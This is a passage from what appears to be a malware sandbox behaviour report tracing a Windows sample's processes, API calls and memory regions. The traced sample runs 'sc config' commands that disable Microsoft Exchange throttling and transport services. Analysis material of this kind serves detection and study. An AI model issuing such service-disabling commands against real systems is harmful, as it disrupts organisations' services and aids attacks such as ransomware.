hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x50bf1ac | out: lpCommandLine="sc config MSExchangeThrottling start= disabled", lpProcessInformation=0x50bf1ac*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x300, dwThreadId=0x65c)) returned 1 [0133.965] CloseHandle (hObject=0xa4) returned 1 [0133.965] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.965] GetEnvironmentStringsW () returned 0x5149f10* [0133.965] FreeEnvironmentStringsA (penv="=") returned 1 [0133.965] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0134.009] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x50bf144 | out: lpExitCode=0x50bf144*=0x424) returned 1 [0134.009] CloseHandle (hObject=0xa8) returned 1 [0134.010] _vsnwprintf (in: _Buffer=0x50bf22c, _BufferCount=0x13, _Format="%08X", _ArgList=0x50bf14c | out: _Buffer="00000424") returned 8 [0134.010] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0134.010] GetEnvironmentStringsW () returned 0x514b3b0* [0134.010] FreeEnvironmentStringsA (penv="=") returned 1 [0134.010] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0134.010] GetEnvironmentStringsW () returned 0x514b3b0* [0134.010] FreeEnvironmentStringsA (penv="=") returned 1 [0134.010] DeleteProcThreadAttributeList (in: lpAttributeList=0x50bf1d8 | out: lpAttributeList=0x50bf1d8) [0134.010] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.010] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0134.010] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.010] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0134.010] _get_osfhandle (_FileHandle=0) returned 0x38 [0134.010] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0134.010] SetConsoleInputExeNameW () returned 0x1 [0134.010] GetConsoleOutputCP () returned 0x1b5 [0134.011] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0134.011] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.011] exit (_Code=1060) Thread: id = 562 os_tid = 0x5c0 Process: id = "174" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3d89d000" os_pid = "0x8f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "173" os_parent_pid = "0xd84" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9021 start_va = 0x7fb12000 end_va = 0x7fb12fff entry_point = 0x0 region_type = private name = "private_0x000000007fb12000" filename = "" Region: id = 9022 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9023 start_va = 0x6878f00000 end_va = 0x6878f1ffff entry_point = 0x0 region_type = private name = "private_0x0000006878f00000" filename = "" Region: id = 9024 start_va = 0x6878f20000 end_va = 0x6878f33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006878f20000" filename = "" Region: id = 9025 start_va = 0x6878f40000 end_va = 0x6878f7ffff entry_point = 0x0 region_type = private name = "private_0x0000006878f40000" filename = "" Region: id = 9026 start_va = 0x7df5ff950000 end_va = 0x7ff5ff94ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff950000" filename = "" Region: id = 9027 start_va = 0x7ff6c44e0000 end_va = 0x7ff6c4502fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c44e0000" filename = "" Region: id = 9028 start_va = 0x7ff6c450d000 end_va = 0x7ff6c450dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c450d000" filename = "" Region: id = 9029 start_va = 0x7ff6c450e000 end_va = 0x7ff6c450ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c450e000" filename = "" Region: id = 9030 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 9031 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9032 start_va = 0x6878f00000 end_va = 0x6878f0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006878f00000" filename = "" Region: id = 9033 start_va = 0x6878f10000 end_va = 0x6878f16fff entry_point = 0x0 region_type = private name = "private_0x0000006878f10000" filename = "" Region: id = 9034 start_va = 0x6878f80000 end_va = 0x6878fbffff entry_point = 0x0 region_type = private name = "private_0x0000006878f80000" filename = "" Region: id = 9035 start_va = 0x6878fc0000 end_va = 0x6878fc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006878fc0000" filename = "" Region: id = 9036 start_va = 0x6878fd0000 end_va = 0x6878fd6fff entry_point = 0x0 region_type = private name = "private_0x0000006878fd0000" filename = "" Region: id = 9037 start_va = 0x6878fe0000 end_va = 0x6878fe0fff entry_point = 0x0 region_type = private name = "private_0x0000006878fe0000" filename = "" Region: id = 9038 start_va = 0x6878ff0000 end_va = 0x6878ff0fff entry_point = 0x0 region_type = private name = "private_0x0000006878ff0000" filename = "" Region: id = 9039 start_va = 0x6879000000 end_va = 0x68790fffff entry_point = 0x0 region_type = private name = "private_0x0000006879000000" filename = "" Region: id = 9040 start_va = 0x6879100000 end_va = 0x68791bdfff entry_point = 0x6879100000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9041 start_va = 0x6879260000 end_va = 0x687926ffff entry_point = 0x0 region_type = private name = "private_0x0000006879260000" filename = "" Region: id = 9042 start_va = 0x6879270000 end_va = 0x68793f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006879270000" filename = "" Region: id = 9043 start_va = 0x6879400000 end_va = 0x6879580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006879400000" filename = "" Region: id = 9044 start_va = 0x6879590000 end_va = 0x687a98ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006879590000" filename = "" Region: id = 9045 start_va = 0x7ff6c43e0000 end_va = 0x7ff6c44dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c43e0000" filename = "" Region: id = 9046 start_va = 0x7ff6c450b000 end_va = 0x7ff6c450cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c450b000" filename = "" Region: id = 9047 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 9048 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 9049 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9050 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9051 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 9052 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9053 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9054 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9055 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9056 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9057 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9058 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 9059 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 9060 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 559 os_tid = 0x764 Thread: id = 560 os_tid = 0x53c Thread: id = 561 os_tid = 0xb4c Process: id = "175" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x10d59000" os_pid = "0x300" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "173" os_parent_pid = "0xd84" cmd_line = "sc config MSExchangeThrottling start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9074 start_va = 0x7b0000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 9075 start_va = 0x7d0000 end_va = 0x7d1fff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 9076 start_va = 0x7e0000 end_va = 0x7f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 9077 start_va = 0x800000 end_va = 0x83ffff entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 9078 start_va = 0x840000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 9079 start_va = 0x880000 end_va = 0x883fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 9080 start_va = 0x890000 end_va = 0x890fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 9081 start_va = 0x8a0000 end_va = 0x8a1fff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 9082 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 9083 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 9084 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9085 start_va = 0x7f570000 end_va = 0x7f592fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f570000" filename = "" Region: id = 9086 start_va = 0x7f594000 end_va = 0x7f594fff entry_point = 0x0 region_type = private name = "private_0x000000007f594000" filename = "" Region: id = 9087 start_va = 0x7f59a000 end_va = 0x7f59afff entry_point = 0x0 region_type = private name = "private_0x000000007f59a000" filename = "" Region: id = 9088 start_va = 0x7f59d000 end_va = 0x7f59ffff entry_point = 0x0 region_type = private name = "private_0x000000007f59d000" filename = "" Region: id = 9089 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9090 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9091 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9092 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9093 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9094 start_va = 0x900000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 9095 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9096 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9097 start_va = 0xaa0000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 9098 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9099 start_va = 0x7b0000 end_va = 0x7bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 9100 start_va = 0x7c0000 end_va = 0x7c3fff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 9101 start_va = 0x8b0000 end_va = 0x8effff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 9102 start_va = 0x910000 end_va = 0x9cdfff entry_point = 0x910000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9103 start_va = 0x9d0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 9104 start_va = 0xc70000 end_va = 0xc7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 9105 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 9106 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9107 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9108 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9109 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9110 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9111 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9112 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9113 start_va = 0x7f470000 end_va = 0x7f56ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f470000" filename = "" Region: id = 9114 start_va = 0x7f597000 end_va = 0x7f599fff entry_point = 0x0 region_type = private name = "private_0x000000007f597000" filename = "" Region: id = 9115 start_va = 0xc80000 end_va = 0xd5efff entry_point = 0xc80000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 9116 start_va = 0xa10000 end_va = 0xa21fff entry_point = 0xa10000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 563 os_tid = 0x65c [0133.998] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0133.998] __set_app_type (_Type=0x1) [0133.998] __p__fmode () returned 0x77ac4d6c [0133.998] __p__commode () returned 0x77ac5b1c [0133.998] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0133.998] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0133.998] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.001] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0134.001] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0134.001] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0134.001] _wcsicmp (_String1="config", _String2="query") returned -14 [0134.001] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0134.001] _wcsicmp (_String1="config", _String2="start") returned -16 [0134.001] _wcsicmp (_String1="config", _String2="pause") returned -13 [0134.001] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0134.001] _wcsicmp (_String1="config", _String2="control") returned -14 [0134.001] _wcsicmp (_String1="config", _String2="continue") returned -14 [0134.001] _wcsicmp (_String1="config", _String2="stop") returned -16 [0134.001] _wcsicmp (_String1="config", _String2="config") returned 0 [0134.001] ResolveDelayLoadedAPI () returned 0x77262c10 [0134.001] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xaa8558 [0134.003] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0134.003] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0134.003] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0134.003] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0134.003] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0134.003] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0134.003] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0134.003] OpenServiceW (hSCManager=0xaa8558, lpServiceName="MSExchangeThrottling", dwDesiredAccess=0x3) returned 0x0 [0134.003] GetLastError () returned 0x424 [0134.003] _ultow (in: _Dest=0x424, _Radix=8911916 | out: _Dest=0x424) returned="1060" [0134.003] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0134.004] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x87fc08, nSize=0x2, Arguments=0x87fc20 | out: lpBuffer="裨ªﱈ\x87蔔è") returned 0x62 [0134.005] GetFileType (hFile=0x3c) returned 0x2 [0134.005] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x87fbec | out: lpMode=0x87fbec) returned 1 [0134.005] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xaa88e8*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x87fbfc, lpReserved=0x0 | out: lpBuffer=0xaa88e8*, lpNumberOfCharsWritten=0x87fbfc*=0x62) returned 1 [0134.005] LocalFree (hMem=0xaa88e8) returned 0x0 [0134.005] LocalFree (hMem=0x0) returned 0x0 [0134.005] CloseServiceHandle (hSCObject=0xaa8558) returned 1 [0134.006] LocalFree (hMem=0x0) returned 0x0 [0134.006] exit (_Code=1060) Thread: id = 564 os_tid = 0xd50 Process: id = "176" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x40417000" os_pid = "0xd64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeTransport start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9117 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 9118 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 9119 start_va = 0x4410000 end_va = 0x442ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 9120 start_va = 0x4430000 end_va = 0x4431fff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 9121 start_va = 0x4440000 end_va = 0x4453fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004440000" filename = "" Region: id = 9122 start_va = 0x4460000 end_va = 0x449ffff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 9123 start_va = 0x44a0000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 9124 start_va = 0x45a0000 end_va = 0x45a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 9125 start_va = 0x45b0000 end_va = 0x45b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 9126 start_va = 0x45c0000 end_va = 0x45c1fff entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 9127 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9128 start_va = 0x7f480000 end_va = 0x7f4a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f480000" filename = "" Region: id = 9129 start_va = 0x7f4aa000 end_va = 0x7f4aafff entry_point = 0x0 region_type = private name = "private_0x000000007f4aa000" filename = "" Region: id = 9130 start_va = 0x7f4ab000 end_va = 0x7f4abfff entry_point = 0x0 region_type = private name = "private_0x000000007f4ab000" filename = "" Region: id = 9131 start_va = 0x7f4ad000 end_va = 0x7f4affff entry_point = 0x0 region_type = private name = "private_0x000000007f4ad000" filename = "" Region: id = 9132 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9133 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9134 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9135 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9136 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9137 start_va = 0x4700000 end_va = 0x470ffff entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 9138 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9139 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9140 start_va = 0x4880000 end_va = 0x497ffff entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 9141 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9182 start_va = 0x4410000 end_va = 0x441ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004410000" filename = "" Region: id = 9183 start_va = 0x45d0000 end_va = 0x468dfff entry_point = 0x45d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9184 start_va = 0x4690000 end_va = 0x46cffff entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 9185 start_va = 0x4710000 end_va = 0x480ffff entry_point = 0x0 region_type = private name = "private_0x0000000004710000" filename = "" Region: id = 9186 start_va = 0x4ac0000 end_va = 0x4acffff entry_point = 0x0 region_type = private name = "private_0x0000000004ac0000" filename = "" Region: id = 9187 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" 